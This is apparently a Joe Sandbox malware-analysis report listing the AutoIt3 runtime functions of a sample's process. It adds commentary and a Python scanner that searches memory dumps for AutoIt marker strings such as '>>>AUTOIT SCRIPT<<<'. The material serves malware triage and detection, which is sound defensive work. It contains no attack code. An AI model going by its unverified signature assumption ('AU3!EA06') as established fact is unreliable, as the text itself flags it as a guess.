                                                                        • Instruction ID: eb6e004205882586ff6ddc67e6ba8bf4a6964e9049c12f31c5e5c4101f47ec5d
                                                                        • Opcode Fuzzy Hash: 9041e83b7843873d7435f52d3c6ade67852d22bd3735c3197a4900c2b6ea927c
                                                                        • Instruction Fuzzy Hash: D441C3B2504309AAD331EB60DC85FEF77DCAF84350F00462EF2C5921A5EB79A648D796

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 01009D16
                                                                          • Part of subcall function 010033B7: EncodePointer.KERNEL32(00000000), ref: 010033BA
                                                                          • Part of subcall function 010033B7: __initp_misc_winsig.LIBCMT ref: 010033D5
                                                                          • Part of subcall function 010033B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0100A0D0
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0100A0E4
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0100A0F7
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0100A10A
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0100A11D
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0100A130
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0100A143
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0100A156
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0100A169
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0100A17C
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0100A18F
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0100A1A2
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0100A1B5
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0100A1C8
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0100A1DB
                                                                          • Part of subcall function 010033B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0100A1EE
                                                                        • __mtinitlocks.LIBCMT ref: 01009D1B
                                                                        • __mtterm.LIBCMT ref: 01009D24
                                                                          • Part of subcall function 01009D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,01009D29,01007EFD,0109CD38,00000014), ref: 01009E86
                                                                          • Part of subcall function 01009D8C: _free.LIBCMT ref: 01009E8D
                                                                          • Part of subcall function 01009D8C: DeleteCriticalSection.KERNEL32(010A0C00,?,?,01009D29,01007EFD,0109CD38,00000014), ref: 01009EAF
                                                                        • __calloc_crt.LIBCMT ref: 01009D49
                                                                        • __initptd.LIBCMT ref: 01009D6B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01009D72
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 3567560977-0
                                                                        • Opcode ID: 06d5812876377467366c94c4dddb38f19944c6b2df1899d2165253f9bfe66be5
                                                                        • Instruction ID: 1605751ab00938cf75839a10246a86a5183e722ac42eb7674443984c3cd2d759
                                                                        • Opcode Fuzzy Hash: 06d5812876377467366c94c4dddb38f19944c6b2df1899d2165253f9bfe66be5
                                                                        • Instruction Fuzzy Hash: C9F0CD32A997125AF6777B78BC026CA2AC4DB62638F20425AF1D8D60C7EF1180400290

                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                        control_flow_graph 1084 ff50db-ff514b CreateWindowExW * 2 ShowWindow * 2
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FF5109
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FF512A
                                                                        • ShowWindow.USER32(00000000), ref: 00FF513E
                                                                        • ShowWindow.USER32(00000000), ref: 00FF5147
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: 8ff4f5e782890f00e733a38fa988d6fcaf06553d67fc6b4ad482900fe90978bc
                                                                        • Instruction ID: 8d4e35fe2a59596981fe088807c9f1b83eca00fe3f0f657d534cf94246d00165
                                                                        • Opcode Fuzzy Hash: 8ff4f5e782890f00e733a38fa988d6fcaf06553d67fc6b4ad482900fe90978bc
                                                                        • Instruction Fuzzy Hash: ADF05E71A402947EEA311623AC0CE373E7DE7C7F50F40821EB940A2158C67B1840CBB0

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00FF4A8C: _fseek.LIBCMT ref: 00FF4AA4
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DE1
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DF4
                                                                        • _free.LIBCMT ref: 01049C5F
                                                                        • _free.LIBCMT ref: 01049C66
                                                                        • _free.LIBCMT ref: 01049CD1
                                                                          • Part of subcall function 01002F85: RtlFreeHeap.NTDLL(00000000,00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002F99
                                                                          • Part of subcall function 01002F85: GetLastError.KERNEL32(00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002FAB
                                                                        • _free.LIBCMT ref: 01049CD9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 1552873950-2806939583
                                                                        • Opcode ID: 48fe5a4aed0b8193e66c01b3e9ee607f4d8362ebf1d8fe6289e38dedeffbdbb8
                                                                        • Instruction ID: 7938b71f9bc4114f5dcc0788819efd588d9b129c75c650c761f1a1d37130e3e1
                                                                        • Opcode Fuzzy Hash: 48fe5a4aed0b8193e66c01b3e9ee607f4d8362ebf1d8fe6289e38dedeffbdbb8
                                                                        • Instruction Fuzzy Hash: 62512FB1D04219AFDF24DF64DC85AAEBBB9FF48304F0045AEB649A3250DB755A80CF58
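
The listings for process 0000001C on this page are the stock AutoIt3 runtime, not payload logic: the CRT start-up (`__init_pointers`, the FlsAlloc/FlsFree lookups), the hidden main window created with class and caption "AutoIt v3", the `_wcscmp` against ">>>AUTOIT SCRIPT<<<" that the interpreter uses to locate the script it must run, the `Shell_NotifyIconW` tray icon, and the HKCU `Control Panel\Mouse` read for SwapMouseButtons. The malicious behaviour therefore comes from the script this interpreter executes, which is what to carve out next. The scanner below is an added example, not part of the Joe Sandbox report or of AutoIt: it searches a dropped file or memory dump for the marker strings shown in these listings, in both ASCII and UTF-16LE (the runtime keeps most of them as wide strings), and gives a coarse verdict. The `AU3!EA06` compiled-script signature is an assumption from general AutoIt knowledge, not a value taken from this report, and the sample bytes are constructed.

```python
"""Offline scanner for the AutoIt3 marker strings seen in the function listings.

Added example, not part of the Joe Sandbox report.
Usage: python <this file> <file-or-memory-dump>
"""
import re
import sys
from dataclasses import dataclass
from typing import List

# Strings taken from the API / String listings of process 0000001C.
REPORT_STRINGS = [
    ">>>AUTOIT SCRIPT<<<",    # compared with _wcscmp when the runtime looks for its script
    "AutoIt v3",              # class and caption of the hidden main window (CreateWindowExW)
    "AutoIt - ",              # title prefix of the runtime's error message box
    "Control Panel\\Mouse",   # HKCU key read for SwapMouseButtons
]

# Assumption, not stated in the report: the narrow signature that heads an
# AutoIt3 compiled-script resource ("AU3!" followed by the EA06 format tag).
AU3_SIGNATURE = "AU3!EA06"

ENCODINGS = ("ascii", "utf-16le")


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str
    offset: int


def find_autoit_markers(data: bytes) -> List[Hit]:
    """Return every occurrence of the markers in `data`, in both encodings.

    Searching UTF-16LE as well as ASCII matters: the interpreter holds the
    window-class and script-marker strings as wide strings, while the
    compiled-script signature is narrow.
    """
    hits: List[Hit] = []
    for marker in REPORT_STRINGS + [AU3_SIGNATURE]:
        for enc in ENCODINGS:
            needle = re.escape(marker.encode(enc))
            for m in re.finditer(needle, data):
                hits.append(Hit(marker, enc, m.start()))
    return sorted(hits, key=lambda h: h.offset)


def classify(hits: List[Hit]) -> str:
    """Coarse verdict: compiled script present, bare interpreter, or neither."""
    names = {h.marker for h in hits}
    if AU3_SIGNATURE in names:
        return "autoit3-compiled-script"     # a script resource is embedded or attached
    if ">>>AUTOIT SCRIPT<<<" in names and "AutoIt v3" in names:
        return "autoit3-interpreter"         # runtime strings only: the host, not the payload
    if names:
        return "autoit3-strings-present"
    return "no-autoit3-markers"


# Constructed test data (not a real dump): a fake header, the wide window-class
# string, the narrow script marker and, in the second sample, the AU3 signature.
INTERPRETER_SAMPLE = (
    b"MZ" + b"\x00" * 14                     # offsets 0..15
    + "AutoIt v3".encode("utf-16le")         # offset 16, 18 bytes
    + b"\x00" * 6                            # offsets 34..39
    + b">>>AUTOIT SCRIPT<<<"                 # offset 40, 19 bytes
    + b"\x00" * 5                            # offsets 59..63
)
COMPILED_SAMPLE = INTERPRETER_SAMPLE + b"AU3!EA06"   # signature at offset 64


def main(argv: List[str]) -> int:
    if len(argv) != 2:
        print(__doc__)
        return 2
    with open(argv[1], "rb") as fh:
        data = fh.read()
    hits = find_autoit_markers(data)
    for h in hits:
        print(f"{h.offset:#010x}  {h.encoding:8}  {h.marker}")
    print("verdict:", classify(hits))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against the dropped executable and against the 0000001C memory dumps listed above; a dump that yields only the interpreter verdict means the script was loaded from elsewhere (an external .a3x file or a separately allocated buffer), so look for the signature in the other dumps of the same process.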

                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                        control_flow_graph 1129 100563d-1005656 1130 1005673 1129->1130 1131 1005658-100565d 1129->1131 1132 1005675-100567b 1130->1132 1131->1130 1133 100565f-1005661 1131->1133 1134 1005663-1005668 call 1008d58 1133->1134 1135 100567c-1005681 1133->1135 1143 100566e call 1008fe6 1134->1143 1137 1005683-100568d 1135->1137 1138 100568f-1005693 1135->1138 1137->1138 1140 10056b3-10056c2 1137->1140 1141 10056a3-10056a5 1138->1141 1142 1005695-10056a0 call 1003010 1138->1142 1146 10056c4-10056c7 1140->1146 1147 10056c9 1140->1147 1141->1134 1145 10056a7-10056b1 1141->1145 1142->1141 1143->1130 1145->1134 1145->1140 1148 10056ce-10056d3 1146->1148 1147->1148 1151 10056d9-10056e0 1148->1151 1152 10057bc-10057bf 1148->1152 1153 1005721-1005723 1151->1153 1154 10056e2-10056ea 1151->1154 1152->1132 1156 1005725-1005727 1153->1156 1157 100578d-100578e call 1010dd7 1153->1157 1154->1153 1155 10056ec 1154->1155 1158 10056f2-10056f4 1155->1158 1159 10057ea 1155->1159 1160 1005729-1005731 1156->1160 1161 100574b-1005756 1156->1161 1170 1005793-1005797 1157->1170 1165 10056f6-10056f8 1158->1165 1166 10056fb-1005700 1158->1166 1167 10057ee-10057f7 1159->1167 1168 1005741-1005745 1160->1168 1169 1005733-100573f 1160->1169 1163 1005758 1161->1163 1164 100575a-100575d 1161->1164 1163->1164 1172 10057c4-10057c8 1164->1172 1173 100575f-100576b call 1004906 call 101108b 1164->1173 1165->1166 1166->1172 1174 1005706-100571f call 1010ef8 1166->1174 1167->1132 1171 1005747-1005749 1168->1171 1169->1171 1170->1167 1175 1005799-100579e 1170->1175 1171->1164 1177 10057da-10057e5 call 1008d58 1172->1177 1178 10057ca-10057d7 call 1003010 1172->1178 1190 1005770-1005775 1173->1190 1189 1005782-100578b 1174->1189 1175->1172 1176 10057a0-10057b1 1175->1176 1181 10057b4-10057b6 1176->1181 1177->1143 1178->1177 1181->1151 1181->1152 1189->1181 1191 100577b-100577e 1190->1191 1192 10057fc-1005800 1190->1192 1191->1159 1193 1005780 1191->1193 1192->1167 1193->1189
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1559183368-0
                                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                        • Instruction ID: 318010d748bb477efabf498a131fcb8262f680a4bdb51a84911c8e722dfefe74
                                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                        • Instruction Fuzzy Hash: 1451C430A00306DBFB268F6DEC806AE7BF5BF14324F1487A9E9A9972D0D77099509F40
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE534A
                                                                        • TranslateMessage.USER32(?), ref: 00FE5356
                                                                        • DispatchMessageW.USER32(?), ref: 00FE5360
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                        • String ID:
                                                                        • API String ID: 1795658109-0
                                                                        • Opcode ID: 8b332d1c0f98dc6edb4edaa92584e00a792023c152bdacd8bbb50f658258c15d
                                                                        • Instruction ID: 96252f13f36cb2402bdb9652cd4c8b1aa76d3029e6d344646ccd856f06716dcf
                                                                        • Opcode Fuzzy Hash: 8b332d1c0f98dc6edb4edaa92584e00a792023c152bdacd8bbb50f658258c15d
                                                                        • Instruction Fuzzy Hash: 44317C31900B869FEB30CAA5C848FBA37E9AB01B08F60405EF291931C9D7BFA445F711
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12A8
                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12C9
                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 5344d66fcdab814dd11c5fd9e350dbceaeeebeecb34256f67efbc80fd88af55f
                                                                        • Instruction ID: 7b212a1164c2c6cef2294b1a2711410b8ce7427fa0589aa297d0be825064710c
                                                                        • Opcode Fuzzy Hash: 5344d66fcdab814dd11c5fd9e350dbceaeeebeecb34256f67efbc80fd88af55f
                                                                        • Instruction Fuzzy Hash: 6E115A71910248BFDB218FA6DC84EAFBBB8FF05750F004569F945E7104D2319E40A7A0
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,01072C4C), ref: 01043F57
                                                                        • GetLastError.KERNEL32 ref: 01043F66
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 01043F75
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,01072C4C), ref: 01043FD2
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 2267087916-0
                                                                        • Opcode ID: 8d76dcd4c696ffd1401283367ca6f63026540430758274096eb1d4724f980a6f
                                                                        • Instruction ID: 42dfa685bd8ad3716e94e02939ab5faa193e323f7afa828e066d5a6837a1f0dc
                                                                        • Opcode Fuzzy Hash: 8d76dcd4c696ffd1401283367ca6f63026540430758274096eb1d4724f980a6f
                                                                        • Instruction Fuzzy Hash: 1D21A3B05082119F8710DF68C8C18AEBBF4FE56364F105A6DF4D5DB2A2D731D946CB42
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF5B58
                                                                          • Part of subcall function 00FF56F8: _memset.LIBCMT ref: 00FF5787
                                                                          • Part of subcall function 00FF56F8: _wcscpy.LIBCMT ref: 00FF57DB
                                                                          • Part of subcall function 00FF56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF57EB
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00FF5BAD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FF5BBC
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 01030D7C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: ab3ed911dd7ebccf7f0d7d368c9da8ffb281d20eab236a7a727d75d5d57855da
• Instruction ID: 23b115ff14c414cc64583881407c2ded83f6e3e98b2e60c5d90a9991bbaf8f0b
• Opcode Fuzzy Hash: ab3ed911dd7ebccf7f0d7d368c9da8ffb281d20eab236a7a727d75d5d57855da
• Instruction Fuzzy Hash: B22107B0905B889FE7729B248899BFEBBECAF41714F00008DF7DA56286C3752984DB41
APIs
  • Part of subcall function 00FF49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FF27AF,?,00000001), ref: 00FF49F4
• _free.LIBCMT ref: 0102FB04
• _free.LIBCMT ref: 0102FB4B
  • Part of subcall function 00FF29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FF2ADF
Strings
• Bad directive syntax error, xrefs: 0102FB33
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: Bad directive syntax error
• API String ID: 2861923089-2118420937
• Opcode ID: a74aa60d45c75f249b1d6733a4cc756c1ca839f216c7190ac1a44d0d1bbdb2cf
• Instruction ID: be5343d30ea5fdc04af5277cff9af30d94959f1694f5df4a82370a0b68498aeb
• Opcode Fuzzy Hash: a74aa60d45c75f249b1d6733a4cc756c1ca839f216c7190ac1a44d0d1bbdb2cf
• Instruction Fuzzy Hash: E791A271A1022EEFCF04EFA4CC909EEB7B4FF15340F00456AE995AB2A1DB349904DB50
APIs
  • Part of subcall function 00FF4AB2: __fread_nolock.LIBCMT ref: 00FF4AD0
• _wcscmp.LIBCMT ref: 01049DE1
• _wcscmp.LIBCMT ref: 01049DF4
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 4f09de93b295c31ee998381e383257276406a01dedc19a67ed34793a394cbefa
• Instruction ID: f668006b30d7316506e8a8bf266c104b1b4a605d5f916af5644840bcb137dfc2
• Opcode Fuzzy Hash: 4f09de93b295c31ee998381e383257276406a01dedc19a67ed34793a394cbefa
• Instruction Fuzzy Hash: EB410671A4020ABBDF219EA5CC85FEF7BFDEF49714F00007AFA40A7194D679A9048B64
APIs
• _memset.LIBCMT ref: 0103032B
• GetOpenFileNameW.COMDLG32(?), ref: 01030375
  • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
  • Part of subcall function 010009C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 010009E4
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: 1a29f5e6c36c9b8e303150a40a7517b5f9410ff940cd1d632f90c11bed9ac02b
• Instruction ID: 6ea2026723a778cf12174dbaf249ff303bedb326a6666def1b0c06554f1e5eac
• Opcode Fuzzy Hash: 1a29f5e6c36c9b8e303150a40a7517b5f9410ff940cd1d632f90c11bed9ac02b
• Instruction Fuzzy Hash: F821A171A0128C9BDF45DFD8C844BEE7BFCAF49300F00805AE544AB284DBB95988DFA1
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a712077b08e77c31a42b7b6d74bc5b319ff1b6a0fdb7e18c610d4e6754d0899
• Instruction ID: f49ecf8b5a75571554e19e418ea3d1c39a0a9b15a1be340adc69386b05f0f859
• Opcode Fuzzy Hash: 6a712077b08e77c31a42b7b6d74bc5b319ff1b6a0fdb7e18c610d4e6754d0899
• Instruction Fuzzy Hash: 8BF149706083419FC754DF68C880A6ABBE5FF88314F14896EF8999B351DB34E946CF92
APIs
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 010007EC
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 010007F4
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 010007FF
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0100080A
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 01000812
  • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0100081A
  • Part of subcall function 00FFFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FEAC6B), ref: 00FFFFA7
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FEAD08
• OleInitialize.OLE32(00000000), ref: 00FEAD85
• CloseHandle.KERNEL32(00000000), ref: 01022F56
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: 25b8a7afd00439743c21e3b1b682de2ca4fae028fe52e075fdea0e67cfb78b65
• Instruction ID: dbfa2e22617995492d028db15f8d2d06a6ed6e5920f142cad4d03084270d47e0
• Opcode Fuzzy Hash: 25b8a7afd00439743c21e3b1b682de2ca4fae028fe52e075fdea0e67cfb78b65
• Instruction Fuzzy Hash: 6E81CBB2A01A448FC3A8DF79E8416597FE4FB98304B80C26AD5D8C736AEB7B44058F55
APIs
• _memset.LIBCMT ref: 00FF59F9
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF5A9E
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FF5ABB
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
• Opcode ID: ba641f937bbb4f6b9247e479098d698d2f3ee9612fff098aa14ce091e2742408
• Instruction ID: d2f870d043b50bb0700bae2c34eddea6741f461a8fbf1aa6001e695b50383b79
• Opcode Fuzzy Hash: ba641f937bbb4f6b9247e479098d698d2f3ee9612fff098aa14ce091e2742408
• Instruction Fuzzy Hash: 6F31B4B0905B058FC731DF24D4846ABBBE4FF49714F000A2EF7DA86250E77AA954DB52
APIs
• __FF_MSGBANNER.LIBCMT ref: 01005953
  • Part of subcall function 0100A39B: __NMSG_WRITE.LIBCMT ref: 0100A3C2
  • Part of subcall function 0100A39B: __NMSG_WRITE.LIBCMT ref: 0100A3CC
• __NMSG_WRITE.LIBCMT ref: 0100595A
  • Part of subcall function 0100A3F8: GetModuleFileNameW.KERNEL32(00000000,010A53BA,00000104,00000004,00000001,01001003), ref: 0100A48A
